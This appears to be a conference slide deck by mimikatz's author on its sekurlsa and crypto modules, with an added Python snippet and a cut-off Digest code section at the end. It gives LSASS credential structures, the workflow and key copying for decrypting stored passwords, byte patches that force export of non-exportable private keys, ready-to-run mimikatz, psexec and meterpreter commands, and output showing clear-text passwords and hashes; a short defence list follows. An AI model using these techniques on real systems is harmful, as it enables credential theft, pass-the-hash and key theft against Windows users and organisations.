nt!RtlpBreakWithStatusInstruction:
814b39d0 cc              int     3
0: kd> .reload /user
Loading User Symbols
0: kd> bp /p $proc lsasrv!LsaProtectMemory "kc 5; g"
0: kd> g
mimikatz :: sekurlsa :: livessp – how?
Let's login with a Live account on Windows 8
After credentials protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)

[call stacks caught by the trap, top frame first]
lsasrv!LsaProtectMemory
livessp!LiveMakeSupplementalCred
livessp!LiveMakeSecPkgCredentials
livessp!LsaApLogonUserEx2
livessp!SpiLogonUserEx2

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials

1: kd> uf /c livessp!LsaApLogonUserEx2
livessp!LsaApLogonUserEx2 (74781536)
  […]
  livessp!LsaApLogonUserEx2+0x560 (74781a96):
    call to livessp!LiveCreateLogonSession (74784867)

Our LiveSSP provider!
Yeah, pass-the-hash capability with a Live account too…
A Live user can logon through RDP via SSO
mimikatz :: sekurlsa :: livessp – workflow
[diagram] LsaEnumerateLogonSessions → for each LUID → livessp!LiveGlobalLogonSessionList → search the linked list for the LUID → KIWI_LIVESSP_LIST_ENTRY → KIWI_LIVESSP_PRIMARY_CREDENTIAL (suppCreds) → LsaUnprotectMemory → password in clear

typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
    DWORD isSupp;
    DWORD unk0;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;

typedef struct _KIWI_LIVESSP_LIST_ENTRY {
    struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
    struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
    DWORD unk4;
    DWORD unk5;
    PVOID unk6;
    LUID LocallyUniqueIdentifier;
    LSA_UNICODE_STRING UserName;
    PVOID unk7;
    PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
} KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;
mimikatz :: sekurlsa
Even if we already have tools for normal accounts, are you not curious to test one with this trap?
Me: yes!
mimikatz :: sekurlsa :: kerberos
Let's login with a normal account
After credentials protection, KerbCreateLogonSession calls
  – NT6: KerbInsertOrLocateLogonSession to insert data in KerbGlobalLogonSessionTable
  – NT5: KerbInsertLogonSession to insert data in KerbLogonSessionList

[call stacks caught by the trap, top frame first]
lsasrv!LsaProtectMemory
kerberos!KerbHideKey
kerberos!KerbCreatePrimaryCredentials
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials
  ← Kerberos key part (the ticket part? maybe :))

lsasrv!LsaProtectMemory
kerberos!KerbHidePassword
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials
  ← Kerberos part for the password

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
wdigest!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials
mimikatz :: sekurlsa :: kerberos (nt6) – workflow
[diagram] LsaEnumerateLogonSessions → for each LUID → kerberos!KerbGlobalLogonSessionTable (RtlLookupElementGenericTableAvl) → KIWI_KERBEROS_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear

typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
    DWORD unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
#ifdef _M_X64
    BYTE unk4[32];
#elif defined _M_IX86
    BYTE unk4[20];
#endif
    LUID LocallyUniqueIdentifier;
#ifdef _M_X64
    BYTE unk5[44];
#elif defined _M_IX86
    BYTE unk5[36];
#endif
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
mimikatz :: sekurlsa :: kerberos (nt5) – workflow
[diagram] LsaEnumerateLogonSessions → for each LUID → kerberos!KerbLogonSessionList → search the linked list for the LUID → KIWI_KERBEROS_LOGON_SESSION → LsaUnprotectMemory → password in clear

typedef struct _KIWI_KERBEROS_LOGON_SESSION {
    struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
    struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
    DWORD UsageCount;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    DWORD unk3;
    DWORD unk4;
    PVOID unk5;
    PVOID unk6;
    PVOID unk7;
    LUID LocallyUniqueIdentifier;
#ifdef _M_IX86
    DWORD unk8;
#endif
    DWORD unk9;
    DWORD unk10;
    PVOID unk11;
    DWORD unk12;
    DWORD unk13;
    PVOID unk14;
    PVOID unk15;
    PVOID unk16;
    […]
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
mimikatz :: sekurlsa – demo time
Final sekurlsa demo: sekurlsa::logonPasswords full
mimikatz :: sekurlsa :: kerberos – “hu?”
Ok. It works…
But why?
Not for all logons on NT5 (it can need an unlock)
From my understanding of Microsoft's explanations:
  – no need of passwords for the Kerberos protocol…
  – all is based on the hash (not very sexy either)
Microsoft's implementation of Kerberos is full of logic…
  – For password auth:
    • password hash as the shared secret, but the password is kept in memory
  – For full smartcard auth:
    • No password on the client
    • No hash on the client
      – NTLM hash on the client…
      – the KDC sent it back as a gift!
mimikatz :: sekurlsa
All passwords in memory are encrypted, but in a reversible way, so that they can be used
We used LsaUnprotectMemory in the LSASS context to decrypt them
  – This function relies on LsaEncryptMemory from lsasrv.dll
For that we previously injected a DLL (sekurlsa.dll) into the LSASS process, to benefit from its keys when we called it
Can it be fun to decrypt outside the process?
  – Yes it is… no more injection, just reading the memory of the LSASS process…
mimikatz can use lsasrv.dll too and “imports” the keys initialized by LSASS
  – When we call LsaEncryptMemory in mimikatz with all the keys imported from LSASS, we get the same behaviour as when we are inside LSASS
mimikatz :: sekurlsa :: LsaEncryptMemory NT5
Depending on the size of the secret, LsaEncryptMemory uses:
  – RC4
  – DESx
[diagram: the lsasrv globals in lsass that mimikatz copies into its own lsasrv]
  lsasrv!g_cbRandomKey  DWORD (256)
  lsasrv!g_pRandomKey   → BYTE[g_cbRandomKey]
  lsasrv!g_pDESXKey     → BYTE[144]
  lsasrv!g_Feedback     BYTE[8]
  lsass (lsasrv) → copy… → mimikatz (lsasrv)
mimikatz :: sekurlsa :: LsaEncryptMemory NT6
Depending on the size of the secret, LsaEncryptMemory uses:
  – 3DES
  – AES
[diagram: the lsasrv globals in lsass that mimikatz copies]
  lsasrv!InitializationVector  BYTE[16]
  lsasrv!h3DesKey              → KIWI_BCRYPT_KEY
  lsasrv!hAesKey               → KIWI_BCRYPT_KEY
  lsass (lsasrv) → copy… → mimikatz

typedef struct _KIWI_BCRYPT_KEY_DATA {
    DWORD size;
    DWORD tag;
    DWORD type;
    DWORD unk0;
    DWORD unk1;
    DWORD unk2;
    DWORD unk3;
    PVOID unk4;
    BYTE data;      /* etc. */
} KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

typedef struct _KIWI_BCRYPT_KEY {
    DWORD size;
    DWORD type;
    PVOID unk0;
    PKIWI_BCRYPT_KEY_DATA cle;
    PVOID unk1;
} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
mimikatz :: sekurlsa – memo
Security Packages
  Package          Symbols                                   Type
  tspkg            tspkg!TSGlobalCredTable                   RTL_AVL_TABLE
  wdigest          wdigest!l_LogSessList                     LIST_ENTRY
  livessp          livessp!LiveGlobalLogonSessionList        LIST_ENTRY
  kerberos (nt5)   kerberos!KerbLogonSessionList             LIST_ENTRY
  kerberos (nt6)   kerberos!KerbGlobalLogonSessionTable      RTL_AVL_TABLE
  msv1_0           lsasrv!LogonSessionList                   LIST_ENTRY
                   lsasrv!LogonSessionListCount              ULONG

Protection Keys
  Key     NT 5 symbols
  RC4     lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey
  DESx    lsasrv!g_pDESXKey, lsasrv!g_Feedback

  Key     NT 6 symbols
  (IV)    lsasrv!InitializationVector
  3DES    lsasrv!h3DesKey
  AES     lsasrv!hAesKey
mimikatz :: sekurlsa – memo
Some commands:
  mimikatz privilege::debug "sekurlsa::logonPasswords full" exit
  psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe "sekurlsa::logonPasswords full" exit
  meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe

Output of mimikatz 1.0 (the tool speaks French: Utilisateur = user, Domaine = domain, Mot de passe = password):
mimikatz 1.0 x64 (RC)   /* Traitement du Kiwi (Aug  2 2012 01:32:28) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # sekurlsa::logonPasswords full

Authentification Id         : 0;234870
Package d'authentification  : NTLM
Utilisateur principal       : Gentil Kiwi
Domaine d'authentification  : vm-w8-rp-x
        msv1_0 :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Hash LM      : d0e9aee149655a6075e4540af1f22d3b
         * Hash NTLM    : cc36cf7a8514893efccd332446158b1a
        kerberos :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Mot de passe : waza1234
        wdigest :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Mot de passe : waza1234
        tspkg :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Mot de passe : waza1234
        livessp : n.t. (LUID KO)
mimikatz :: sekurlsa – what we can do
Basics:
  – No physical access to the computer (first step to pass-the-hash, then pass-the-pass)
  – No admin rights / system rights / debug privileges (…)
  – Disable local admin accounts
  – Strong passwords (haha, it was a joke: useless against this)
  – For privileged accounts: network logon instead of interactive logon (when possible)
  – Audit: pass-the-hash leaves traces and can lock accounts
  – No admin rights / system rights / debug privileges, even for VIPs
  – Use a separate network (or forest) for privileged tasks
More in depth:
  – Force strong authentication (SmartCard & Token) $ €
  – Short validity for Kerberos tickets
  – No delegation
  – Disable NTLM (available with NT6)
  – Nothing exotic:
    • biometrics (it keeps the password somewhere and pushes it to Windows)
    • single sign-on
  – Stop using shared secrets for authentication, push public/private stuff (like keys ;))
  – Take the opportunities to drop backward compatibility
  – Disable faulty providers
    • Is it supported by Microsoft?
    • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
mimikatz :: crypto – what is it?
A little module that I wrote to:
  – play with the Windows Cryptographic API, CNG and RSA keys
  – automate the export of certificates/keys
    • Even those which are “not” exportable
What the crypto module can do:
  – List
    • Providers
    • Stores
    • Certificates
    • Keys
  – Export
    • Certificates
      – public part in DER format
      – with private keys in PFX format
    • Private keys in PVK format – it's cool, OpenSSL can deal with it too
  – Patch
    • CryptoAPI in the mimikatz context
    • CNG in the LSASS context (again!)
(module: mod_mimikatz_crypto)
mimikatz :: crypto – how it's protected
Private keys are DPAPI protected
  – You cannot reuse private key files on another computer
    • At least not without the master keys and/or the users' passwords
Computer/User can load their own keys because they have enough secrets to do it (ex: session opened)
  – Yes, a computer/server opens a “session” too
Export/Usage can be limited by:
  – Password / Popup (a constraint for most users; unavailable for computer keys)
  – The Export/Archive flag not being present

  certutil -importpfx mycert.p12 NoExport
  certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz :: crypto :: capi – how it works
“Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware.” – http://technet.microsoft.com/library/cc962093.aspx
Processes (mimikatz, IIS, Active Directory, Internet Explorer, your apps here…) load some DLLs to deal with the different cryptographic stuff: CSP (keys), smartcard reader, …
  – cryptdll.dll, rsaenh.dll, …
Processes deal with cryptographic keys through this API…
mimikatz :: crypto :: capi – how it's exported (PLAYSKOOL level)
[diagram] Process → CryptoAPI and RSA CSP: Load Private Key (DPAPI decode) → Ask to export the key → Exportable? → yes: Exported key / no: NTE_BAD_KEY_STATE
mimikatz :: crypto :: patchcapi – because I own my process
When we want to export a certificate with its private key (or only the key), it goes through rsaenh!CPExportKey
This function does all the work to prepare the export, and checks if the key is exportable

mimikatz # crypto::exportCertificates
Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'\My
 - Benjamin Delpy
        Container Clé  : 470ADFBA-8718-4014-B05E-B30776B75A03
        Provider       : Microsoft Enhanced Cryptographic Provider v1.0
        Type           : AT_KEYEXCHANGE
        Exportabilité  : NON
        Taille clé     : 2048
        Export privé dans  'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié.
        Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

================ Certificat 0 ================
Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
Émetteur : CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Objet : CN=Benjamin Delpy, C=FR
Il ne s'agit pas d'un certificat racine
Hach. cert. (sha1) : ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
  Conteneur de clé = 470ADFBA-8718-4014-B05E-B30776B75A03
  Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
La clé privée NE PEUT PAS être exportée
Succès du test de cryptage
CertUtil: -exportPFX : ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

(0x8009000b is NTE_BAD_KEY_STATE, “Key not valid for use in specified state”: both mimikatz and certutil get it from the CSP because the key is flagged non-exportable.)
mimikatz :: crypto :: patchcapi :: because I own my process
So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space: let's patch it!
I wrote "4" bytes in my memory space:

.text:0AC0B7CB 0F 85 33 C7 FF FF    jnz  continue_key_export_or_archive
.text:0AC0B7CB 90                   nop
.text:0AC0B7CC E9 33 C7 FF FF       jmp  continue_key_export_or_archive

.text:0AC1F749 0F 85 B6 3B FF FF    jnz  continue_key_export_or_archive_prepare
.text:0AC1F749 90                   nop
.text:0AC1F74A E9 B6 3B FF FF       jmp  continue_key_export_or_archive_prepare
mimikatz :: crypto :: patchcapi :: demo time
Import, export, import as not exportable… export!
mimikatz :: crypto :: patchcapi :: limitations
Because…
– I'm lazy
– I've seen in the majority of cases RSA keys for real-life use
  • Elliptic Curve, a little…
mimikatz crypto::patchcapi only deals with:
– Microsoft Base Cryptographic Provider v1.0
– Microsoft Enhanced Cryptographic Provider v1.0
– Microsoft Enhanced RSA and AES Cryptographic Provider
– Microsoft RSA SChannel Cryptographic Provider
– Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll
mimikatz :: crypto :: cng :: how it works
“Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior.” – http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
“To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default.”
This time, key operations are not made in the “user” process context.
Processes use RPC to call “Key Isolation service” (keyiso) functions.
It seems more secure than CryptoAPI… – It is, but it's not perfect…
mimikatz :: crypto :: cng :: how it's exported ( level)
[Diagram: the process calls CNG, which forwards the export request over RPC to the KeyIso service hosted in the LSASS process (NT6 system protected process: ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP, SYSTEM_MANDATORY_LABEL_NO_READ_UP). KeyIso loads the private key (DPAPI decode) and checks the exportable flag: yes → exported key; no → NTE_NOT_SUPPORTED.]
mimikatz :: crypto :: patchcng :: because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key), the RPC calls lead to lsass(keyiso)!ncrypt!SPCryptExportKey.
This function does all the work to prepare the export and checks whether the key is exportable.

mimikatz # crypto::exportKeys
[user]
Clés CNG :
  - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
    Exportabilité : NON
    Taille clé    : 2048
    Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
    mod_cryptong::getPrivateKey / PrivateKeyBlobToPVK : (0x80090029) L'opération demandée n'est pas prise en charge.
mimikatz :: crypto :: patchcng :: because sometimes I own LSASS
This time, checks and keys are in the LSASS process… And what?
I wrote "1" byte in LSASS memory space…

.text:6C815210 75 1C    jnz  short continue_key_export
.text:6C815210 EB 1C    jmp  short continue_key_export
mimikatz :: crypto :: patchcng :: demo time
Import, export, import as not exportable… export again!
mimikatz :: crypto :: patchcng :: limitations
Patch operation needs some privileges:
– Admin (debug privilege)
– SYSTEM
mimikatz crypto::patchcng only deals with:
– Microsoft Software Key Storage Provider (maybe other algorithms than RSA)
Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates… even those that are exportable (huh?) – certutil can…
mimikatz :: crypto :: patchcng :: bonus
After one admin has patched LSASS, all users of the current system benefit from the extra exports
– until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for the export can work too
– Yeah, like the good old certutil:

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
CertUtil : -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil : Clé non valide pour l'utilisation dans l'état spécifié.

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
Succès du test de chiffrement
CertUtil : -exportPFX La commande s'est terminée correctement.
mimikatz :: crypto :: memo
Some commands:
mimikatz crypto::patchcapi crypto::exportCertificates exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::exportKeys computer exit
mimikatz crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop"
mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit
Password
– PFX files are protected by this password: mimikatz
Keys
– When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key… funny, isn't it?
  • So yes, mimikatz can export it
mimikatz :: crypto :: what we can do?
Exactly the same as for sekurlsa: it is about preventing access to accounts / the computer – no admin, no admin, no admin…
Basics
– Use smartcards/tokens for user certificates
– Use Hardware Security Modules (HSM), even SoftHSM
More in depth
– See what Microsoft can do with the TPM from Windows 8
  • Virtual SmartCard seems promising
– Verify vendors' implementation (Lenovo, Dell, …) of TPM CSP/KSP
  • Their biometrics stuff was a little buggy ;)
mimikatz :: what else can it do?
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker / SRP bypass
Driver
– Play with tokens & privileges
– Display SSDT x86 & x64
– List minifilters actions
– List Notifications (process, thread, image, registry)
– List Objects hooks and procedures
– …
…
mimikatz :: that's all folks!
Thanks to / Merci à
– my girlfriend for her support (her LSASS crashed a few times)
– Application Security Forum for offering me this great opportunity
  • Partners and Sponsors, for sure
– Microsoft for always considering it as normal/acceptable
– Security friends/community for their ideas & challenges
  • nagual, newsoft, mubix, …
– You, for your attention
Questions?
Don't be shy ;)
especially if you have written the corresponding slide number
Blog, Source Code & Contact
blog: http://blog.gentilkiwi.com
mimikatz: http://blog.gentilkiwi.com/mimikatz
source: https://code.google.com/p/mimikatz
email: benjamin@gentilkiwi.com
mimikatz :: sekurlsa :: history of « pass-the-* » 2/2
Pass-the-pass
– 05/2011 – mimikatz 1.0 dumps first clear-text passwords from the TsPkg provider (but limited to NT 6 and some XP SP3)
  • http://blog.gentilkiwi.com/securite/pass-the-pass
– 05/2011 – return of mimikatz: it dumps clear-text passwords from the WDigest provider (unlimited this time ;))
  • http://blog.gentilkiwi.com/securite/re-pass-the-pass
– 05/2011 – Some organizations opened cases to Microsoft about it…
…Lots of time…
– beginning of 2012 – Lots of blogs (and Kevin Mitnick ;)) say a few words about mimikatz
– 03/2012 – Hernan Ochoa (Amplia Security) publishes on seclists that wce supports WDigest password extraction…
  • http://seclists.org/pen-test/2012/Mar/7
– 03/2012 – mimikatz strikes again with the LiveSSP provider and extracts Live login passwords from Windows 8 memory
  • http://blog.gentilkiwi.com/securite/rere-pass-the-pass
– 03/2012 – yeah, once again… more curious, but Kerberos keeps passwords in memory
  • http://blog.gentilkiwi.com/securite/rerere-pass-the-pass
– 08/2012 – sekurlsa module without injection at all (ultra safe)
  • http://blog.gentilkiwi.com/securite/mimikatz/sekurlsa-fait-son-apparition
mimikatz :: sekurlsa :: tspkg
because sometimes hash is not enough…
mimikatz :: sekurlsa :: tspkg :: what is it?
Microsoft introduced SSO capability for Terminal Server with NT 6 to improve the RemoteApp and Remote Desktop user experience – http://technet.microsoft.com/library/cc772108.aspx
It relies on CredSSP with Credentials Delegation (= Account delegation)
– Specs: http://download.microsoft.com/download/9/5/e/95ef66af-9026-4bb0-a41d-a4f81802d92c/%5Bms-cssp%5D.pdf
First impression: it seems cool
– User does not have to type their password
– Password is not in the RDP file
– Password is not in user secrets
mimikatz :: sekurlsa :: tspkg :: questions
The KB says that for it to work we must enable « Default credentials » delegation
– “Default credentials: The credentials obtained when the user first logs on to Windows” – https://msdn.microsoft.com/library/bb204773.aspx
  • What? Our User/Domain/Password? | Hash? | Ticket? It seems…
– In all cases, the system seems to be vulnerable to pass-the-…
In what form? Our specs: [MS-CSSP]
– 2.2.1.2.1 TSPasswordCreds
  • The TSPasswordCreds structure contains the user's password credentials that are delegated to the server (or PIN).
    TSPasswordCreds ::= SEQUENCE {
        domainName  [0] OCTET STRING,
        userName    [1] OCTET STRING,
        password    [2] OCTET STRING
    }
– Challenge response for authentication?
  • Server: YES (TLS, Kerberos)
  • Client: NO, the password is sent to the server…
So the password resides somewhere in memory!
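As an added example (not from the slides and not mimikatz code), a minimal DER encoder/decoder for the TSPasswordCreds structure quoted above ([MS-CSSP] 2.2.1.2.1), to make concrete what CredSSP delegation actually hands to the server: the password itself, as one OCTET STRING. The UTF-16LE encoding of the three strings and the sample credentials are assumptions; the slide only gives the ASN.1 types.

```python
# Added example: DER encode/decode of [MS-CSSP] TSPasswordCreds.
# Assumption: the three OCTET STRINGs carry UTF-16LE text, as CredSSP
# implementations do; the slide itself only states the ASN.1 types.
from __future__ import annotations

TAG_SEQUENCE = 0x30
TAG_OCTET_STRING = 0x04
FIELD_NAMES = {0: "domainName", 1: "userName", 2: "password"}


def der_len(n: int) -> bytes:
    """DER length octets: short form below 128, else 0x80|count + big-endian bytes."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag: int, value: bytes) -> bytes:
    """One tag-length-value element."""
    return bytes([tag]) + der_len(len(value)) + value


def context(idx: int, inner: bytes) -> bytes:
    """EXPLICIT context-specific tag [idx]: constructed, class 10 -> 0xA0 | idx."""
    return tlv(0xA0 | idx, inner)


def encode_ts_password_creds(domain: str, user: str, password: str) -> bytes:
    """TSPasswordCreds ::= SEQUENCE { domainName [0], userName [1], password [2] }."""
    body = b"".join(
        context(i, tlv(TAG_OCTET_STRING, s.encode("utf-16-le")))
        for i, s in enumerate((domain, user, password))
    )
    return tlv(TAG_SEQUENCE, body)


def read_tlv(buf: bytes, pos: int) -> tuple[int, bytes, int]:
    """Parse one TLV at pos -> (tag, value, next_pos); refuses truncated input."""
    tag = buf[pos]
    first = buf[pos + 1]
    pos += 2
    if first < 0x80:
        length = first
    else:
        nbytes = first & 0x7F
        if nbytes == 0 or nbytes > 4 or pos + nbytes > len(buf):
            raise ValueError("unsupported or truncated DER length")
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    value = buf[pos:pos + length]
    if len(value) != length:
        raise ValueError("truncated TLV")
    return tag, value, pos + length


def decode_ts_password_creds(blob: bytes) -> dict[str, str]:
    """Inverse of encode_ts_password_creds, strict about structure."""
    tag, body, end = read_tlv(blob, 0)
    if tag != TAG_SEQUENCE or end != len(blob):
        raise ValueError("expected exactly one SEQUENCE")
    out: dict[str, str] = {}
    pos = 0
    while pos < len(body):
        ctag, cval, pos = read_tlv(body, pos)
        idx = ctag & 0x1F
        if (ctag & 0xE0) != 0xA0 or idx not in FIELD_NAMES:
            raise ValueError(f"unexpected tag 0x{ctag:02x}")
        itag, ival, iend = read_tlv(cval, 0)
        if itag != TAG_OCTET_STRING or iend != len(cval):
            raise ValueError("context tag must wrap a single OCTET STRING")
        out[FIELD_NAMES[idx]] = ival.decode("utf-16-le")
    if len(out) != len(FIELD_NAMES):
        raise ValueError("missing TSPasswordCreds field")
    return out


if __name__ == "__main__":
    # Constructed sample credentials; nothing here comes from a real system.
    blob = encode_ts_password_creds("CORP", "alice", "Sup3rSecret!")
    print(blob.hex())
    print(decode_ts_password_creds(blob))
```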
mimikatz :: sekurlsa :: tspkg :: symbols & theory
Let's explore some symbols
– sounds cool… (thanks Microsoft)
Let's imagine a scenario
– Enumerate all sessions to obtain:
  • Username
  • Domain
  • LUID
– Call tspkg!TSCredTableLocateDefaultCreds (relies on RtlLookupElementGenericTableAvl) with the LUID to obtain:
  • TS_CREDENTIAL
– Call tspkg!TSObtainClearCreds (relies on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for:
  • TS_PRIMARY_CREDENTIAL with clear-text credentials…

kd> x tspkg!*clear*
75016d1c tspkg!TSObtainClearCreds = <no type information>
kd> x tspkg!*password*
75011b68 tspkg!TSDuplicatePassword = <no type information>
75011cd4 tspkg!TSHidePassword = <no type information>
750195ee tspkg!TSRevealPassword = <no type information>
75012fbd tspkg!TSUpdateCredentialsPassword = <no type information>
kd> x tspkg!*locate*
7501158b tspkg!TSCredTableLocateDefaultCreds = <no type information>
mimikatz :: sekurlsa :: tspkg :: workflow
[Diagram: LsaEnumerateLogonSessions → for each LUID → lookup in tspkg!TSGlobalCredTable via RtlLookupElementGenericTableAvl → KIWI_TS_CREDENTIAL → pTsPrimary → KIWI_TS_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear]

typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {
    PVOID unk0;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Password;
} KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL;

typedef struct _KIWI_TS_CREDENTIAL {
#ifdef _M_X64
    BYTE unk0[108];
#elif defined _M_IX86
    BYTE unk0[64];
#endif
    LUID LocallyUniqueIdentifier;
    PVOID unk1;
    PVOID unk2;
    PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;
} KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;
mimikatz :: sekurlsa :: tspkg :: demo time
sekurlsa::tspkg
mimikatz :: sekurlsa :: wdigest
because clear text password over http/https is not cool
mimikatz :: sekurlsa :: wdigest :: what is it?
“Digest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a user's web browser. It applies a hash function to a password before sending it over the network. […]” – Wikipedia, http://en.wikipedia.org/wiki/Digest_access_authentication
“Common Digest Authentication Scenarios – Authenticated client access to a Web site – Authenticated client access using SASL – Authenticated client access with integrity protection to a directory service using LDAP” – Microsoft, http://technet.microsoft.com/library/cc778868.aspx
Again, it seems cool
– No password over the network, just hashes
– No reversible password in Active Directory, hashes for each realm
  • Only with Advanced Digest authentication
mimikatz :: sekurlsa :: wdigest :: what is it?
We speak about hashes, but what hashes?
H = MD5(HA1:nonce:[…]:HA2)
  • HA1 = MD5(username:realm:password)
  • HA2 = MD5(method:digestURI[…])
Even after login, HA1 may change… the realm comes from the server side and cannot be determined before Windows logon.
The WDigest provider must have the elements to compute responses for different servers:
– Username
– Realm (from server)
– Password
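As an added example (not from the slides or from mimikatz), the RFC 2617 Digest computation that the WDigest provider has to reproduce, written out so the point of the slide is visible in code: HA1 mixes in the server-chosen realm, so no realm-independent hash can be cached at logon and the provider needs the password itself. The sample values are the public worked example from RFC 2617 §3.5; the extra realm names are constructed.

```python
# Added example: RFC 2617 Digest response computation (qop=auth).
# Demonstrates why HA1 cannot be precomputed before the realm is known.
import hashlib


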